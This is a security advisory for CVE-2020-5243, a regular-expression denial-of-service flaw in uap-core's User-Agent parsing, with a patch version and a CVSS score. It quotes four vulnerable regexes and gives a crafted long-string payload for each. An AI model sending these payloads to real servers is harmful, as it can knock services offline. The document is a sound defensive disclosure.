CVE-2020-5243

MEDIUM5.7EPSS 0.80%

Denial of Service in uap-core when processing crafted User-Agent strings

Published: 2/20/2020Modified: 3/13/2026
Also known as:GHSA-cmcx-xhr8-3w9p

Description

### Impact Some regexes are vulnerable to regular expression denial of service (REDoS) due to overlapping capture groups. This allows remote attackers to overload a server by setting the User-Agent header in an HTTP(S) request to maliciously crafted long strings. ### Patches Please update uap-core to >= v0.7.3 Downstream packages such as uap-python, uap-ruby etc which depend upon uap-core follow different version schemes. ### Details Each vulnerable regular expression reported here contains 3 overlapping capture groups. Backtracking has approximately cubic time complexity with respect to the length of the user-agent string. #### Regex 1: ``` \bSmartWatch *\( *([^;]+) *; *([^;]+) *; ``` is vulnerable in portion ` *([^;]+) *` and can be attacked with ```python "SmartWatch(" + (" " * 3500) + "z" ``` e.g. ``` SmartWatch( z ``` #### Regex 2: ``` ; *([^;/]+) Build[/ ]Huawei(MT1-U06|[A-Z]+\d+[^\);]+)[^\);]*\) ``` is vulnerable in portion `\d+[^\);]+[^\);]*` and can be attacked with ```python ";A Build HuaweiA" + ("4" * 3500) + "z" ``` #### Regex 3: ``` (HbbTV)/[0-9]+\.[0-9]+\.[0-9]+ \([^;]*; *(LG)E *; *([^;]*) *;[^;]*;[^;]*;\) ``` is vulnerable in portion ` *([^;]*) *` and can be attacked with ```python "HbbTV/0.0.0 (;LGE;" + (" " * 3500) + "z" ``` #### Regex 4: ``` (HbbTV)/[0-9]+\.[0-9]+\.[0-9]+ \([^;]*; *(?:CUS:([^;]*)|([^;]+)) *; *([^;]*) *;.*; ``` is vulnerable in portions ` *(?:CUS:([^;]*)|([^;]+)) *` and ` *([^;]*) *` and can be attacked with ```python "HbbTV/0.0.0 (;CUS:;" + (" " * 3500) + "z" "HbbTV/0.0.0 (;" + (" " * 3500) + "z" "HbbTV/0.0.0 (;z;" + (" " * 3500) + "z" ``` Reported by Ben Caller @bcaller

Affected packages (3)

CVSS scores

SourceVersionSeverityVector
osvCVSS 3.1MEDIUM5.7CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H

References (6)